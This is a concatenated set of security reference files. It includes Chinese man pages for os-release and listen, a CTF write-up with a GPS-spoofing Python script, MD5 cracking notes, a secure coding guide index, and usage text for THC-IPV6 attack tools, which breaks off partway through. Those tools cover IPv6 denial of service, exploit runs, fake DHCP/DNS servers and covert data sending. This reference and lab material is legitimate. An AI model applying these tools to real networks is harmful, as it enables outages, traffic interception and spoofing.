'\" t .TH "OS\-RELEASE" "5" "" "systemd 231" "os-release" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http://bugs.debian.org/507673 .\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \n(.g .ds Aq \(aq .el .ds Aq ' .\" ----------------------------------------------------------------- .\" * set default formatting .\" ----------------------------------------------------------------- .\" disable hyphenation .nh .\" disable justification (adjust text to left margin only) .ad l .\" ----------------------------------------------------------------- .\" * MAIN CONTENT STARTS HERE * .\" ----------------------------------------------------------------- .SH "NAME" os-release \- 操作系统标识 .SH "SYNOPSIS" .PP /etc/os\-release .PP /usr/lib/os\-release .SH "描述" .PP /etc/os\-release 与 /usr/lib/os\-release 文件包含了操作系统识别数据。 .PP os\-release 文件的基本格式是 一系列换行符分隔的 VAR=VALUE 行(每行一个变量), 可以直接嵌入到 shell 脚本中使用。 注意,此文件并不支持变量替换之类的任何高级 shell 特性, 以便于应用程序无须支持这些高级 shell 特性, 即可直接使用此文件。 如果 VALUE 值中包含任何非字母数字字符(也就是 A\(enZ, a\(enz, 0\(en9 之外的字符), 那么必须使用引号(单双皆可)界定, 并且任何在Shell中具有特殊含义的字符, 包括:美元符, 单双引号, 反斜线, 反引号 \&.\&.\&. 等等,都必须使用shell风格的反斜线进行转义。 所有字符串都必须使用UTF\-8编码, 并且禁止使用一切非打印字符。 以"#"开头的行将被作为注释忽略。 .PP 应用程序应该只读取 /etc/os\-release 文件, 仅在 /etc/os\-release 不存在的情况下, 才可以读取 /usr/lib/os\-release 文件。 绝对禁止应用程序同时读取两个文件。 操作系统发行商应该将操作系统识别数据存放在 /usr/lib/os\-release 文件中, 同时将 /etc/os\-release 作为一个软连接, 以相对路径的方式指向 /usr/lib/os\-release 文件, 以提供应用程序读取 /etc 的兼容性。 软连接使用相对路径是为了避免在 chroot 或 initrd 环境中失效。 .PP os\-release 的内容应当仅由发行版的供应商设置, 系统管理员一般不应该修改此文件。 .PP 因为此文件仅用于操作系统识别, 所以必须禁止包含任何需要本地化的内容(也就是禁止包含非ASCII字符)。 .PP /etc/os\-release 与 /usr/lib/os\-release 可以是软连接, 但是必须全部位于根文件系统上, 以确保在系统刚启动时即可读取其内容。 .PP 更多有关 os\-release 的理解, 请参阅 \m[blue]\fBAnnouncement of /etc/os\-release\fR\m[]\&\s-2\u[1]\d\s+2 .SH "选项" .PP 可以在 os\-release 中使用下列操作系统识别字段: .PP \fINAME=\fR .RS 4 不带版本号且适合人类阅读的操作系统名称。这是必填字段。例如: "NAME=Fedora" 或 "NAME="Debian GNU/Linux"" 。 默认值是 "NAME=Linux" 。 .RE .PP \fIVERSION=\fR .RS 4 操作系统的版本号。 禁止包含操作系统名称,但是可以包含适合人类阅读的发行代号。 这是可选字段。 例如: "VERSION=17" 或 "VERSION="17 (Beefy Miracle)"" .RE .PP \fIID=\fR .RS 4 小写字母表示的操作系统名称, 禁止包含 0\(en9, a\(enz, "\&.", "_", "\-" 以外的字符,禁止包含任何版本信息。 该字段适合被程序或脚本解析,也可用于生成文件名。 这是必填字段。例如: "ID=fedora" 或 "ID=debian" 。 默认值是 "ID=linux" 。 .RE .PP \fIID_LIKE=\fR .RS 4 一系列空格分隔的字符串, 其中的每一项都符合 \fIID=\fR 字段的规范, 也就是仅包含 0\(en9, a\(enz, "\&.", "_", "\-" 字符。 此字段用于表明当前的操作系统 是从哪些"父发行版"派生而来, 切勿列出从此发行版派生的"子发行版", 排列顺序由近到远, 关系最近的发行版名称排在最前, 紧密度依次递减。 应用程序如果不能识别 \fIID=\fR 字段的内容, 那么可以参考此字段。 这是可选字段。 比如对于 "ID=centos"来说, "ID_LIKE="rhel fedora"" 就是一个合理的设置。 而对于 "ID=ubuntu" 来说, "ID_LIKE=debian" 也很合理。 .RE .PP \fIVERSION_CODENAME=\fR .RS 4 小写字母表示的操作系统发行代号, 禁止包含 0\(en9, a\(enz, "\&.", "_", "\-" 以外的字符, 禁止包含任何版本信息以及操作系统名称。 该字段适合被程序或脚本解析, 也可用于生成文件名。 这是可选字段, 并且某些发行版可能不存在此字段。例如: "VERSION_CODENAME=buster", "VERSION_CODENAME=xenial" .RE .PP \fIVERSION_ID=\fR .RS 4 小写字母表示的操作系统版本号, 禁止包含 0\(en9, a\(enz, "\&.", "_", "\-" 以外的字符, 禁止包含操作系统名称与发行代号。 该字段适合被程序或脚本解析, 也可用于生成文件名。 这是可选字段。例如: "VERSION_ID=17" 或 "VERSION_ID=11\&.04" .RE .PP \fIPRETTY_NAME=\fR .RS 4 适合人类阅读的比较恰当的发行版名称, 可选的包含发行代号与系统版本之类的信息,内容比较随意。 这是必填字段。 例如: "PRETTY_NAME="Fedora 17 (Beefy Miracle)"" 。 默认值是 "PRETTY_NAME="Linux"" 。 .RE .PP \fIANSI_COLOR=\fR .RS 4 在控制台上显示操作系统名称的文字颜色。 必须设为符合 ESC [ m ANSI/ECMA\-48 转义代码规范的字符串。 这是可选字段。 例如: "ANSI_COLOR="0;31""(红色) 或 "ANSI_COLOR="1;34""(淡蓝) .RE .PP \fICPE_NAME=\fR .RS 4 操作系统的"CPE名称"(URI绑定语法), 详见 \m[blue]\fBCommon Platform Enumeration Specification\fR\m[]\&\s-2\u[2]\d\s+2 文档。 这是可选字段。例如: "CPE_NAME="cpe:/o:fedoraproject:fedora:17"" .RE .PP \fIHOME_URL=\fR, \fISUPPORT_URL=\fR, \fIBUG_REPORT_URL=\fR, \fIPRIVACY_POLICY_URL=\fR .RS 4 与操作系统相关的互联网地址。 \fIHOME_URL=\fR 操作系统的主页地址, 或者特定于此版本操作系统的页面地址。 \fISUPPORT_URL=\fR 操作系统的支持页面(若存在), 主要用于发行商提供技术支持的页面。 \fIBUG_REPORT_URL=\fR 故障汇报页面(若存在), 主要用于基于社区互动的发行版。 \fIPRIVACY_POLICY_URL=\fR 隐私条款页面(若存在)。 上述URL应该分别出现在"About this system"界面下的 "About this Operating System", "Obtain Support", "Report a Bug", "Privacy Policy" 子界面中。 这些字段的值必须符合 \m[blue]\fBRFC3986\fR\m[]\&\s-2\u[3]\d\s+2 规范, 通常以 "http:" 或 "https:" 开头, 但也可能以 "mailto:" 或 "tel:" 开头。 例如: "HOME_URL="https://fedoraproject\&.org/"" 与 "BUG_REPORT_URL="https://bugzilla\&.redhat\&.com/"" .RE .PP \fIBUILD_ID=\fR .RS 4 用于区分同一版本操作系统的不同编译次序的唯一标示符(不会被系统更新所修改)。 该字段在不同的 VERSION_ID 之间有可能是相同的, 因为 BUILD_ID 仅在同一版本号内部保持唯一。 每当发布新版本的操作系统时, 只需要更新 VERSION_ID 字段即可,并不一定必须更新 BUILD_ID 字段。 这是可选字段。 例如: "BUILD_ID="2013\-03\-20\&.3"" 或 "BUILD_ID=201303203" .RE .PP \fIVARIANT=\fR .RS 4 适合人类阅读的发行版分支标识符。 用于向用户表明 此系统的默认配置是专门面向特定应用场景的。 这是可选字段, 并且某些发行版可能不存在此字段。 例如: "VARIANT="Server Edition"", "VARIANT="Smart Refrigerator Edition"" 注意,此字段仅用于显示目的, 程序应该使用 \fIVARIANT_ID\fR 字段进行可靠的判断。 .RE .PP \fIVARIANT_ID=\fR .RS 4 小写字母表示的发行版分支标识符, 禁止包含 0\(en9, a\(enz, "\&.", "_", "\-" 以外的字符。 该字段适合被程序或脚本解析, 也可用于生成文件名。 这是可选字段, 并且某些发行版可能不存在此字段。 例如: "VARIANT_ID=server", "VARIANT_ID=embedded" .RE .PP 如果要在程序中检测发行版名称及其变种, 那么可以使用 \fIID\fR 与 \fIVERSION_ID\fR 字段, 并将 \fIID_LIKE\fR 用作 \fIID\fR 的替补。 如果想要向用户显示发行版的名称, 那么可以使用 \fIPRETTY_NAME\fR 字段。 .PP 注意, 滚动发布的发行版可能不会提供版本信息, 也就程序不能假定 \fIVERSION\fR 与 \fIVERSION_ID\fR 字段必然存在。 .PP 操作系统的发行商可能为此文件引入新的字段, 强烈建议为新引入的字段使用特别的前缀以避免冲突。 读取此文件的程序应该能够安全的忽略不理解的字段。 例如: "DEBIAN_BTS="debbugs://bugs\&.debian\&.org/"" .SH "例子" .sp .if n \{\ .RS 4 .\} .nf NAME=Fedora VERSION="24 (Workstation Edition)" ID=fedora VERSION_ID=24 PRETTY_NAME="Fedora 24 (Workstation Edition)" ANSI_COLOR="0;34" CPE_NAME="cpe:/o:fedoraproject:fedora:24" HOME_URL="https://fedoraproject\&.org/" BUG_REPORT_URL="https://bugzilla\&.redhat\&.com/" REDHAT_BUGZILLA_PRODUCT="Fedora" REDHAT_BUGZILLA_PRODUCT_VERSION=24 REDHAT_SUPPORT_PRODUCT="Fedora" REDHAT_SUPPORT_PRODUCT_VERSION=24 PRIVACY_POLICY_URL=https://fedoraproject\&.org/wiki/Legal:PrivacyPolicy VARIANT="Workstation Edition" VARIANT_ID=workstation .fi .if n \{\ .RE .\} .SH "参见" .PP \fBsystemd\fR(1), \fBlsb_release\fR(1), \fBhostname\fR(5), \fBmachine-id\fR(5), \fBmachine-info\fR(5) .SH "NOTES" .IP " 1." 4 Announcement of /etc/os-release .RS 4 \%http://0pointer.de/blog/projects/os-release .RE .IP " 2." 4 Common Platform Enumeration Specification .RS 4 \%http://scap.nist.gov/specifications/cpe/ .RE .IP " 3." 4 RFC3986 .RS 4 \%https://tools.ietf.org/html/rfc3986 .RE .\" manpages-zh translator: 金步国 .\" manpages-zh comment: 金步国作品集:http://www.jinbuguo.com
sec-knowleage
# Race of a lifetime, Misc, 100pts > You are participating in a race around the world. The prize would be a personalized flag, together with a brand new car. Who wouldn't want that? You are given some locations during this race, and you need to get there as quick as possible. The race organisation is monitoring your movements using the GPS embedded in the car. However, your car is so old and could never win against those used by the opposition. Time to figure out another way to win this race. A pretty simple challenge, we just have to pretend to be GPS output and spoof it to make it look as though we are very fast (but not too fast, to avoid triggering some "asserts"). Final code: ```python import serial, sys s = serial.Serial("/dev/ttyUSB0", 115200, timeout = 2) print s.read_until("\t") s.write("ak\n") t = s.read_until(">") print t t = t.splitlines()[2].split() lat = float(t[1]) lng = float(t[3]) airports = [ (49.0096906, 2.5479245), # Paris (31.1443439, 121.808273), # Shanghai (37.6213129, -122.3789554), # San Francisco ] plan = [ (51.9979819, 4.3855044, "R", "tgt") # Riscure ] i = 0 speed = { "R": 0.3, "A": 7, "A2": 7.5, "R2": 0.9, } dt = 1 def length(a, b): return (a**2 + b**2) ** 0.5 def demax(dlat, dlng): l = length(dlat, dlng) if l > dt: dlat /= l dlng /= l dlat *= dt dlng *= dt return dlat, dlng tm = 0 while True: tm += 1 print "time", tm print "plan: ", plan print "GOTO", plan[i] dlat, dlng = plan[i][0] - lat, plan[i][1] - lng if dt > 6: dt = 7 + (2) / (51.99 - 31.14) * (lat - 31.14) print "spd", dt if abs(dlat) < 0.01 and abs(dlng) < 0.01: i += 1 dt = speed[plan[i][2]] dlat, dlng = plan[i][0] - lat, plan[i][1] - lng print "delta1", dlat, dlng if dlng < -180: dlng += 360 print "delta2", dlat, dlng dlat, dlng = demax(dlat, dlng) lat += dlat lng += dlng if lng > 180: lng -= 360 s.write("%.7f %.7f\n" % (lat, lng)) rd = s.read_until(">") print rd lines = rd.splitlines() for line in lines: if "Location:" in line or "Delft" in line: if "Kearny" in line: tgtlat, tgtlng = 37.7933885, -122.4067155 elif "Delft" in line: tgtlat, tgtlng = (51.9979819, 4.3855044) # Riscure else: line = line.split() tgtlat = float(line[1]) tgtlng = float(line[2]) dbest = length(lat - tgtlat, lng - tgtlng) / speed["R"] plan = [(tgtlat, tgtlng, "R", "tgt")] for a1 in airports: for a2 in airports: d1 = length(lat - a1[0], lng - a1[1]) / speed["R"] d2 = length(tgtlat - a2[0], tgtlng - a2[1]) / speed["R"] d3 = length(a1[0] - a2[0], a1[1] - a2[1]) / speed["A"] d = d1 + d2 + d3 if d < dbest: dbest = d ch = "A" ch2 = "R" if "Delft" in line: ch = "A2" ch2 = "R2" plan = [(a1[0], a1[1], "R", "air1"), (a2[0], a2[1], ch, "air2"), (tgtlat, tgtlng, ch2, "tgt")] i = 0 tm = 0 dt = speed[plan[i][2]] ```
sec-knowleage
### MD5基本描述 MD5的输入输出如下 - 输入:任意长的消息,512比特长的分组。 - 输出:128比特的消息摘要。 关于详细的介绍,请自行搜索。 此外,有时候我们获得到的md5是16位的,其实那16位是32位md5的长度,是从32位md5值来的。是将32位md5去掉前八位,去掉后八位得到的。 一般来说,我们可以通过函数的初始化来判断是不是MD5函数。一般来说,如果一个函数有如下四个初始化的变量,可以猜测该函数为MD5函数,因为这是MD5函数的初始化IV。 ``` 0x67452301,0xEFCDAB89,0x98BADCFE,0x10325476 ``` ### MD5破解 目前可以说md5已经基本被攻破了,一般的MD5的碰撞都可以在如下网上获取到 - http://www.cmd5.com/ - http://www.ttmd5.com/ - http://pmd5.com/ - https://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip (生成指定前缀的md5碰撞)
sec-knowleage
# 代码安全指南 面向开发人员梳理的代码安全指南,旨在梳理API层面的风险点并提供详实可行的安全编码方案。 ## 理念 基于DevSecOps理念,我们希望用开发者更易懂的方式阐述安全编码方案,引导从源头规避漏洞。 ## 索引 | 规范 | 最后修订日期 | | ------------------ | ------------ | | [C/C++安全指南](./C,C++安全指南.md) | 2021-05-18 | | [JavaScript安全指南](./JavaScript安全指南.md#1) | 2021-05-18 | | [Node安全指南](./JavaScript安全指南.md#2) | 2021-05-18 | | [Go安全指南](./Go安全指南.md) | 2021-05-18 | | [Java安全指南](./Java安全指南.md) | 2021-05-18 | | [Python安全指南](./Python安全指南.md) | 2021-05-18 | ## 实践 代码安全指引可用于以下场景: - 开发人员日常参考 - 编写安全系统扫描策略 - 安全组件开发 - 漏洞修复指引 ## 贡献 盼与社区携手,一道维护完善。欢迎提交修订建议,详参阅[贡献指南](./CONTRIBUTING.md)。 ## 授权许可 Secure Coding Guide by THL A29 Limited, a Tencent company, is licensed under [CC BY 4.0](https://creativecommons.org/licenses/by-sa/4.0/).
sec-knowleage
.\" Copyright (c) 1983, 1991 The Regents of the University of California. .\" All rights reserved. .\" .\" Redistribution and use in source and binary forms, with or without .\" modification, are permitted provided that the following conditions .\" are met: .\" 1. Redistributions of source code must retain the above copyright .\" notice, this list of conditions and the following disclaimer. .\" 2. Redistributions in binary form must reproduce the above copyright .\" notice, this list of conditions and the following disclaimer in the .\" documentation and/or other materials provided with the distribution. .\" 3. All advertising materials mentioning features or use of this software .\" must display the following acknowledgement: .\" This product includes software developed by the University of .\" California, Berkeley and its contributors. .\" 4. Neither the name of the University nor the names of its contributors .\" may be used to endorse or promote products derived from this software .\" without specific prior written permission. .\" .\" THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND .\" ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE .\" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE .\" ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE .\" FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL .\" DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS .\" OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) .\" HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT .\" LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY .\" OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF .\" SUCH DAMAGE. .\" .\" Modified Fri Jul 23 22:07:54 1993 by Rik Faith <faith@cs.unc.edu> .\" Modified 950727 by aeb, following a suggestion by Urs Thuermann .\" <urs@isnogud.escape.de> .\" Modified Tue Oct 22 08:11:14 EDT 1996 by Eric S. Raymond <esr@thyrsus.com> .\" Modified 1998 by Andi Kleen .\" 中文版 Copyright (c) 2002 byeyear 和 www.linuxforum.net .\" .TH LISTEN 2 "23 July 1993" "BSD Man Page" "Linux Programmer's Manual" .SH NAME 名称 listen \- listen for connections on a socket 在一个套接字上倾听连接 .SH SYNOPSIS 概述 .B #include <sys/socket.h> .sp .BI "int listen(int " s ", int " backlog ); .SH DESCRIPTION 描述 在接收连接之前,首先要使用 .BR socket (2) 创建一个套接字,然后调用 .BR listen 使其能够自动接收到来的连接并且为连接队列指定一个长度限制. 之后就可以使用 .BR accept (2) 接收连接. .B listen 调用仅适用于 .B SOCK_STREAM 或者 .BR SOCK_SEQPACKET 类型的套接字. .PP 参数 .I backlog 指定未完成连接队列的最大长度.如果一个连接请求到达时未完成连接 队列已满,那么客户端将接收到错误 .B ECONNREFUSED. 或者,如果下层协议支持重发,那么这个连接请求将被忽略,这样客户端 在重试的时候就有成功的机会. .SH NOTES 注意 在TCP套接字中 .I backlog 的含义在Linux 2.2中已经改变. 它指定了已经完成连接正等待应用程序接收的套接字队列的长度,而不是 未完成连接的数目.未完成连接套接字队列的最大长度可以使用 .B tcp_max_syn_backlog sysctl设置 当打开syncookies时不存在逻辑上的最大长度,此设置将被忽略.参见 .BR tcp (7) 以获取更多信息. .SH "RETURN VALUE" "返回值" 函数执行成功时返回0.错误时返回\-1,并置相应错误代码. .I errno .SH ERRORS 错误 .TP .B EBADF 参数 .I s 不是合法的描述符. .TP .B ENOTSOCK 参数 .I s 不是一个套接字. .TP .B EOPNOTSUPP 套接字类型不支持 .B listen 操作. .SH "CONFORMING TO" "兼容于" Single Unix, 4.4BSD, POSIX 1003.1g. .B listen 函数调用最初出现于4.2BSD. .SH BUGS 勘误 如果套接字类型是 .BR AF_INET , 并且参数 .I backlog 大于常量 .B SOMAXCONN (Linux 2.0&2.2中是128),它将被自动截断为 .BR SOMAXCONN 的值. 有的BSD系统(以及一些BSD扩展)将backlog值限制为5. .SH "SEE ALSO" "参见" .BR accept (2), .BR connect (2), .BR socket (2) .SH "[中文版维护人]" .B byeyear <love_my_love@263.net > .SH "[中文版最新更新]" .B 2002.01.27 .SH "《中国linux论坛man手册页翻译计划》:" .BI http://cmpp.linuxforum.net
sec-knowleage
# THC-IPV6软件包描述 一套完整的工具,可以攻击IPV6和ICMP6固有的协议弱点,并且包含一个易于使用的数据包生产库。 资料来源:https://www.thc.org/thc-ipv6/ [THC-IPV6主页](https://www.thc.org/thc-ipv6/) | [Kali THC-IPV6资源](http://git.kali.org/gitweb/?p=packages/thc-ipv6.git;a=summary) - 作者:The Hacker’s Choice - 许可证:AGPLv3 ## THC-IPV6包含的工具 ### 6to4test.sh - 测试IPv4目标是否有激活的动态6to4隧道 ``` root@kali:~# 6to4test.sh 语法: /usr/bin/6to4test.sh interface ipv4address 这个小脚本测试IPv4目标是否有激活的动态6to4隧道 需要thc-ipv6的address6和thcping6工具 ``` ### address6 - 将mac或ipv4地址转换为ipv6地址 ``` root@kali:~# address6 address6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: address6 mac-address [ipv6-prefix] address6 ipv4-address [ipv6-prefix] address6 ipv6-address 将mac或ipv4地址转换为ipv6地址(如果没有给定第二个选项作为前缀,则使用本地的),或者当给出ipv6地址时, 打印mac或ipv4地址。 输出所有可能的变化。 出错时返回-1或已转换的结果数量 ``` ### alive6 - 显示分段中的活动地址 ``` root@kali:~# alive6 alive6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: alive6 [-I srcip6] [-i file] [-o file] [-DM] [-p] [-F] [-e opt] [-s port,..] [-a port,..] [-u port,..] [-W TIME] [-dlrvS] interface [unicast-or-multicast-address [remote-router]] 显示分段中的活动地址。如果指定了远程路由器,则数据包以分段前缀的路由首部发送 选项: -i file 从输入文件检查系统 -o file 结果写入输出文件 -M 从输入地址枚举硬件地址(MAC)(慢!) -D 从输入地址枚举DHCP地址空间 -p 发送ping数据包进行活跃检查(默认) -e dst,hop 发送一个错误数据包:目标(默认),逐跳 -s port,port,.. 发送TCP-SYN报文到端口进行活跃检查 -a port,port,..T 发送TCP-ACK报文到端口进行活跃检查 -u port,port,.. 发送UDP数据包到端口进行活跃检查 -d DNS解析活跃的ipv6地址 -n number 每个数据包的发送频率(默认值:本地1、远程2) -W time 发送数据包后等待的时间-毫秒(默认值:1) -S 慢速模式,为每个远程目标获取最佳路由或当不存在代理时 -I srcip6 使用指定的IPv6地址作为源 -l 使用本地链接地址而不是全局地址 -v 详细信息(vv:更详细信息,vvv:转储所有数据包) 命令行或输入文件中的目标地址可以包括如下形式的范围 2001:db8::1-fff或2001:db8::1-2:0-ffff:0:0-ffff,等等 出错时返回-1,如果找到的系统是活跃的返回0,什么也没找到则返回1。 ``` ### covert_send6 - 将文件内容隐秘地发送到目标 ``` root@kali:~# covert_send6 covert_send6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法: covert_send6 [-m mtu] [-k key] [-s resend] interface target file [port] 选项: -m mtu 指定最大MTU(默认值:interface MTU,min:1000) -k key 用Blowfish-160加密内容 -s resend 每个分组发送resend次,默认值:1 将文件的内容隐秘地发送到目标,并且其POC - 除比较复杂外 - 刚好放入目标首部。 ``` ### covert_send6d - 将隐秘接收的内容写入文件 ``` root@kali:~# covert_send6d covert_send6d v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:covert_send6d [-k key] interface file 选项: -k key 用Blowfish-160解密内容 将隐秘接收的内容写入文件。 ``` ### denial6 - 对目标执行各种拒绝服务攻击 ``` root@kali:~# denial6 denial6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:denial6 interface destination test-case-number 对目标执行各种拒绝服务攻击。 如果系统是易受攻击的,则这可导致系统崩溃或重载,所以要小心! 如果没有提供test-case-number,则只显示攻击列表。 ``` ### detect-new-ip6 - 此工具可以检测加入本地网络的新ipv6地址 ``` root@kali:~# detect-new-ip6 detect-new-ip6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:detect-new-ip6 interface [script] 此工具可以检测加入本地网络的新ipv6地址。 如果提供了脚本,则首先对检测到的IPv6地址执行此脚本, 然后再对接口执行。 ``` ### detect_sniffer6 - 测试本地LAN上的系统是否正在被嗅探 ``` root@kali:~# detect_sniffer6 detect_sniffer6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:detect_sniffer6 interface [target6] 测试本地LAN上的系统是否正在被嗅探。 适用于Windows、Linux、OS/X和*BSD 如果没有给出目标,则使用link-local-all-nodes地址,但是很少有效。 ``` ### dnsdict6 - 枚举DNS条目的域 ``` root@kali:~# dnsdict6 dnsdict6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:dnsdict6 [-d46] [-s | -m | -l | -x] [-t THREADS] [-D] domain [dictionary-file] 枚举DNS条目的域,如果提供了它使用字典文件, 否则使用内置列表。这个工具是基于gnucitizen.org的dnsmap。 选项: -4 转储IPv4地址 -t NO 指定要使用的线程数(默认值:8,最大值:32)。 -D 转储选定的内置字列表,不进行扫描。 -d 显示NS和MX类型DNS域的IPv6信息。 -S 执行SRV服务名猜解 -[smlx] 选择字典大小:-s(小=50)、-m(中=796)(默认) -l(大=1416)、-x(极大=3211) ``` ### dnsrevenum6 - 执行快速反向DNS枚举,并能够应对慢速服务器 ``` root@kali:~# dnsrevenum6 dnsrevenum6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:dnsrevenum6 dns-server ipv6address 执行快速反向DNS枚举,并能够应对慢速服务器。 例子: dnsrevenum6 dns.test.com 2001:db8:42a8::/48 dnsrevenum6 dns.test.com 8.a.2.4.8.b.d.0.1.0.0.2.ip6.arpa ``` ### dnssecwalk - 执行DNSSEC NSEC漫游 ``` root@kali:~# dnssecwalk dnssecwalk v1.2 (c) 2013 by Marc Heuse <mh@mh-sec.de> http://www.mh-sec.de 语法:dnssecwalk [-e46] dns-server domain 选项: -e 确保域位于找到的地址中,否则退出 -4 解析找到条目的IPv4地址 -6 解析找到条目的IPv6地址 执行DNSSEC NSEC漫游。 示例:dnssecwalk dns.test.com test.com ``` ### dos_mld.sh - 如果指定,将首先丢弃目标的多播地址 ``` root@kali:~# dos_mld.sh 语法:/usr/bin/dos_mld.sh [-2] interface [target-link-local-address multicast-address] 如果指定,目标的多播地址将首先丢弃。 所有的组播流量都会在一段时间后停止。 指定-2选项使用MLDv2。 ``` ### dos-new-ip6 - 此工具可阻止新的ipv6接口出现 ``` root@kali:~# dos-new-ip6 dos-new-ip6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:dos-new-ip6 interface 这个工具通过发送重复ip6检查(DAD)应答来阻止新的ipv6接口出现。 这导致对新ipv6设备的DOS攻击。 ``` ### dump_router6 - 转储所有本地路由器信息 ``` root@kali:~# dump_router6 dump_router6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:dump_router6 interface 转储所有本地路由器信息 ``` ### exploit6 - 对目标执行各种CVE已知的IPv6漏洞利用 ``` root@kali:~# exploit6 exploit6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:exploit6 interface destination [test-case-number] 对目标执行各种CVE已知的IPv6漏洞利用 请注意,对于可利用的溢出,仅使用“AAA...”字符串。 如果一个系统很脆弱,那么它会崩溃,所以要小心! ``` ### extract_hosts6.sh - 打印文件中IPv6地址的主机部分 ``` root@kali:~# extract_hosts6.sh /usr/bin/extract_hosts6.sh FILE 打印文件中IPv6地址的主机部分 ``` ### extract_networks6.sh - 打印文件中找到的网络 ``` root@kali:~# extract_networks6.sh /usr/bin/extract_networks6.sh FILE 打印文件中找到的网络 ``` ### fake_advertise6 - 在网络上公告ipv6地址 ``` root@kali:~# fake_advertise6 fake_advertise6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_advertise6 [-DHF] [-Ors] [-n count] [-w seconds] interface ip-address-advertised [target-address [mac-address-advertised [source-ip-address]]] 在网络上公告ipv6地址(如果没有指定,则使用自己的mac), 如果没有设置目标地址,则将其发送到全节点多播地址。 源IP地址未设置时使用发送者地址。 发送选项: -n count 发送多少包(默认:永远) -w seconds 发送数据包之间的等待时间(默认值:5) 标志选项: -O 不设置覆盖标志(默认:开) -r 设置路由标志(默认:关) -s 设置请求标志(默认:关) ND安全漏洞选项(可以组合): -H 添加一个逐跳首部 -F 添加一个单次片段首部(可以指定多次) -D 添加一个大的目标首部,分片数据包。 ``` ### fake_dhcps6 - 假冒DHCPv6服务器 ``` root@kali:~# fake_dhcps6 fake_dhcps6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_dhcps6 interface network-address / prefix-length dns-server [dhcp-server-ip-address [mac-address]] 假冒DHCPv6服务器,用于配置地址并设置DNS服务器 ``` ### fake_dns6d - 假冒DNS服务器,为任何查找请求提供相同的ipv6地址 ``` root@kali:~# fake_dns6d fake_dns6d v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_dns6d interface ipv6-address [fake-ipv6-address [fake-mac]] 假冒DNS服务器为任何查找请求提供相同的ipv6地址 如果客户端具有固定的DNS服务器,则可以将其与parasite6一起使用 注意:服务器非常简单。不支持数据包中的多重查询,也不支持NS、MX等查询。 ``` ### fake_dnsupdate6 - 假冒DNS更新程序 ``` root@kali:~# fake_dnsupdate6 fake_dnsupdate6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_dnsupdate6 dns-server full-qualified-host-dns-name ipv6address 示例:fake_dnsupdate6 dns.test.com myhost.sub.test.com ::1 ``` ### fake_mipv6 - 将家乡地址所有数据包重定向到转交地址 ``` root@kali:~# fake_mipv6 fake_mipv6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_mipv6 interface home-address home-agent-address care-of-address 如果移动IPv6归属代理被误配置为不使用IPSEC接受MIPV6更新, 则将家乡地址所有数据包重定向到转交地址 ``` ### fake_mld26 ``` root@kali:~# fake_mld26 fake_mld26 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_mld26 [-l] interface add | delete | query [multicast-address [target-address [ttl [own-ip [own-mac-address [destination-mac-address]]]]]] 使用MLDv2协议。只有协议功能的一个子集可以通过命令行来实现。如果您需要某些东西,请编写代码。 可在您选择的多播组中公告或删除自己 - 或任何您想要的人,查询网络上谁正在监听组播地址。 使用-l选项来循环发送(以5秒为间隔),直到按下Control-C。 ``` ### fake_mld6 - 公告或删除自己 - 或任何你想要的人 ``` root@kali:~# fake_mld6 fake_mld6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_mld6 [-l] interface add | delete | query [multicast-address [target-address [ttl [own-ip [own-mac-address [destination-mac-address]]]]]] 在您选择的多播组中公告或删除自己 - 或任何您想要的人,查询网络上谁正在监听组播地址。 使用-l选项来循环发送(以5秒为间隔),直到按下Control-C。 ``` ### fake_mldrouter6 - 宣告、删除或索取MLD路由器 ``` root@kali:~# fake_mldrouter6 fake_mldrouter6 v2.3 (c) 2013 by van Hauser / THC <vh@thc.org> www.thc.org 语法:fake_mldrouter6 [-l] interface advertise | solicitate | terminate [own-ip [own-mac-address]] 宣告、删除或索取MLD路由器 - 自己或其他人。 